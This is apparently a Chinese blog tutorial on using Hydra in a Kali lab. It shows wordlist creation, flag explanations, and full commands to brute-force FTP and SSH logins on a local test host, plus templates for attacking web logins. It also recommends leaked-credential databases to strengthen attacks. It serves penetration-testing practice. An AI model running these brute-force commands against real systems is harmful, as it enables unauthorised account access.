参考链接添加链接描述
一、测试用环境
kali虚拟机
前文搭建了ftp服务器进行测试

二、测试步骤
已知登录界面账号为admin密码为admin
1.常用参数
-R 根据上一次进度继续破解
-S 使用SSL协议连接
-s 指定端口
-l 指定用户名
-L 指定用户名字典(文件)
-p 指定密码破解
-P 指定密码字典(文件)
-e 空密码探测和指定用户密码探测(ns)
-C 用户名可以用:分割(username:password)可以代替-l username -p password
-o 输出文件
-t 指定多线程数量,默认为16个线程
-vV 显示详细过程
2.创建密码字典和用户名字典
创建简单的username字典
kali@kali:~/Desktop$ vim username.txt
kali@kali:~/Desktop$ cat us
username.txt usr/
kali@kali:~/Desktop$ cat username.txt
123456
789456
root
user
abc123
admin
kali@kali:~/Desktop$
创建简单的password字典
kali@kali:~/Desktop$ vim password.txt
kali@kali:~/Desktop$ cat password.txt
123456
abcde
000000
888888
root
admin
111111
kali@kali:~/Desktop$
3.进行ftp爆破登录测试
kali@kali:~$ hydra -L /home/kali/Desktop/username.txt -P /home/kali/Desktop/password.txt -e ns -t 16 -vV 192.168.100.130 ftp

可以看到最后的绿字爆破成功!
4.进行ssh爆破登录测试
命令变化不大,只是后面的协议方式变为了ssh
kali@kali:~$ hydra -L /home/kali/Desktop/username.txt -P /home/kali/Desktop/password.txt -e ns -t 16 -vV -f 192.168.100.130 ssh

为了完成爆破密码的步骤,需要一个强大的社工库,当密码字典足够强大的时候会让渗透工作事半功倍,同时hybra还支持多种协议例如:
get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip
本文详细介绍了如何在Kali Linux环境下利用Hydra工具进行FTP和SSH的暴力破解测试。首先,创建了简单的用户名和密码字典,然后通过`hydra`命令行工具,设置相应的参数如指定用户名字典、密码字典、端口、协议等进行爆破尝试。最终,成功完成了对目标系统的登录密码破解。此外,文章还提到了Hydra支持的其他协议和Web登录破解方法。
Hydra破解&spm=1001.2101.3001.5002&articleId=120624991&d=1&t=3&u=d3acad900a28405bb9229d6c5223a446)
5288

被折叠的 条评论
为什么被折叠?



